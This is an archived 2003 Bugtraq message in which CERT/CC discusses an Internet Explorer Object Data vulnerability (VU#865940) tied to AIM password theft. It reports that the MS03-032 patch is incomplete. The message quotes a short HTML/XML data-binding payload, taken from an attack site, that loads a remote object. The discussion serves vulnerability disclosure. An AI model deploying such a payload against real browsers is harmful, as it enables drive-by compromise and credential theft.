lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <200309241840.h8OIeZR06977@watson.blue.cert.org>
Date: Wed, 24 Sep 2003 14:35:06 -0400
From: "CERT(R) Coordination Center" <cert@...t.org>
To: "Thor Larholm" <thor@...x.com>
Cc: "CERT(R) Coordination Center" <cert@...t.org>,
	"Mark Coleman" <markc@...ontown.com>, bugtraq@...urityfocus.org
Subject: RE: [Fwd: Re: AIM Password theft]  VU#865940


-----BEGIN PGP SIGNED MESSAGE-----

Thor Larholm <thor@...x.com> writes:

> This is just a simple exploit utilizing the Object Data vulnerability
> discovered by Drew Copley, coupled with the GreyMagic no-script HTML
> rendering as demonstrated earlier on this list and others by jelmer.
> 
> Tell your user to go install MS03-032, which he obviously did not do as
> MS03-032 patches this vulnerability. MS03-032 was released on August 20
> and you can find it at
> 
> http://www.microsoft.com/technet/security/bulletin/MS03-032.asp

At the present, the patch for MS03-032 breaks one of at least three
exploit techniques.  The patch does not resolve the vulnerability.
MS03-032 acknowledges this.  I have seen several examples of this
vulnerability being exploited in the wild.

> www.haxr.org contains the following HTML code (with <> replaced to []):
> 
> [span datasrc="#oExec" datafld="counter" dataformatas="html"][/span]
> [xml id="oExec"]
> [security]
> [counter]
> [![CDATA[
> [object data=tracker.php][/object]
> ]]]
> [/counter]
> [/security]
> [/xml]

In particular, the current MS03-32 patch doesn't account for an HTML
document created via XML/data binding:

  <http://greymagic.com/adv/gm001-ie/>

The patch also does not account for an HTML document created via
script:

  <http://www.securityfocus.com/archive/1/336616>

Vulnerability Note VU#865940:

  <http://www.kb.cert.org/vuls/id/865940>


Regards,

  - Art


             Art Manion  --  CERT Coordination Center
    <http://www.cert.org/>   <cert@...t.org>   +1 412-268-7090
         E0 1E DF F5 FC 76 00 32  77 8F 25 F7 B0 2E 2C 27


-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQCVAwUBP3HlHDpmH2w9K/0VAQGBuQQAmrvGlHEXmMx48LhA2dQ/wK8XCqYaVYtD
Y4FPmSvwqZ8phYKhT20Dh9sYGLWHbaJ3sfGA589MOLJwhpZ3aVlunLQ6GjLO1qje
6dab5rVGdgTNzMC87YX2E7RB6uS4K8htL0MhN4LLvbHS402QEeNOhX+Fi2lsLkyi
6uioMggI1Ms=
=Jnmk
-----END PGP SIGNATURE-----


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ